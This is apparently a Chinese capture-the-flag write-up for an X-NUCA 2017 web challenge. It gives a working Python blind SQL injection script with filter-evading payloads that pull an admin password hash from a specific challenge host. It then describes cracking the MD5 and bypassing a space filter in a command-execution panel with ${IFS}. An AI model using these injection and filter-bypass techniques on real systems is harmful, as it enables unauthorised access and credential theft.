简介 :
http://www.hetianlab.com/pages/activity/X-NUCANationalTL2017.jsp
阳光总在风雨后
(破解人数:4)
描述:不要被打击的没信心了
http://218.76.35.74:20130
image.png
首先只给了一个登录界面 , 考虑到可能是SQL盲注
经过测试发现过滤了
小数点
空格
星号
...
根据过滤的规则写出盲注脚本如下 :
#!/usr/bin/env python
# encoding: utf-8
import requests
def login(username, password):
url = "http://218.76.35.74:20130/login.php"
data = {
"uname":username,
"passwd":password
}
print "[+] Payload = %s" % (data)
response = requests.post(url, data=data)
content = response.content
return "password" in content
def main():
START = 0x20
END = 0x80
data = ""
for i in range(0x20):
LEFT = START
RIGHT = END
P = (LEFT + RIGHT) / 2
while True:
username = "admin'^!(ascii(mid(REVERSE(mid(REVERSE(mid((select(passwd)from(admin))from(1)))from(-%d)))from(-1)))>%d)^'" % (i + 1, P)
password = "admin"
if login(username, password):
LEFT = P
P = (LEFT + RIGHT) / 2
else:
RIGHT = P
P = (LEFT + RIGHT) / 2
if (RIGHT - LEFT) < 2:
data += chr(P + 1)
print "[+] Data : [%s]" % (data)
break
# print "[%d] >> [%d] << [%d]" % (LEFT, P, RIGHT)
if __name__ == "__main__":
main()
image.png
注入得到 admin 的密码为 :
50f87a3a3ad48e26a5d9058418fb78b5
md5 解密之后得到明文为 :
image.png
shuangshuang
登录之后发现是一个管理后台 , 有一个功能可以直接执行命令
但是过滤了空格 , 可以通过环境变量 ${IFS} 来代替绕过
还有一个坑就是发现命令执行得到的结果中只有最后一行
猜测可能是后台 php 的代码逻辑如下 :
$command = $_POST['cmd'];
if(strpos($command, ' ')){
die('Not allowed!');
}
system($command.' | tail -n 1');
可以通过命令后加上
head -n 1
来解决这个问题
找到 /var/www/html 下有一个目录为 :
image.png
在其中有一个 php 文件
image.png
内容即为 flag
image.png
